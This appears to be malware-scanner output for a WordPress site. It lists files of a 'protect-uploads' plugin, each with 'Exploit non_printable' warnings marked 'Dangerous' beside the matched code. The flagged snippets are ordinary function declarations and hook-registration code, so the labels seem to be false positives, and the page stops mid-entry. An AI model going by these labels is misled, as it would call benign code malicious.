<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() { </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) ) ) . </span><span style="color: #DD0000">'/languages/' </span><span style="color: #007700">); } public function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain </span><span style="color: #007700">= </span><span style="color: #0000BB">$domain</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_212").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/includes/class-protect-uploads-loader.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_213" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">filters </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">], array( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'component'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'callback'</span><span style="color: #007700">] ), </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'priority'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'accepted_args'</span><span style="color: #007700">] ); } foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">actions </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">],</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">definition on the $component</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should be fired</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that is used to register the actions </span><span style="color: #007700">and </span><span style="color: #0000BB">hooks into a single</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">type The collection of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters registered with WordPress</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add</span><span style="color: #007700">( </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to execute the </span><span style="color: #007700">list </span><span style="color: #0000BB">of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_213").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/includes/class-protect-uploads-deactivator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 313.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_214" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Admin</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_index</span><span style="color: #007700">(); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">(); </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">().</span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_214").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/includes/class-protect-uploads-activator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 112.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_215" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_215").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/includes/class-protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_216" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">-></span><span style="color: #0000BB">run</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_dependencies</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_locale</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">define_admin_hooks</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_216").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_217" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() { require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'admin/class-protect-uploads-admin.php'</span><span style="color: #007700">; require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'includes/class-protect-uploads-deactivator.php'</span><span style="color: #007700">; </span><span style="color: #0000BB">$deactivation </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Deact</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_217").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/admin/class-protect-uploads-admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.85 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 40</span><br><table id="file_218" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">() { foreach (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$name </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messages</span><span style="color: #007700">) { foreach (</span><span style="color: #0000BB">$messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$message</span><span style="color: #007700">) { return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">; } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_protective_files_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
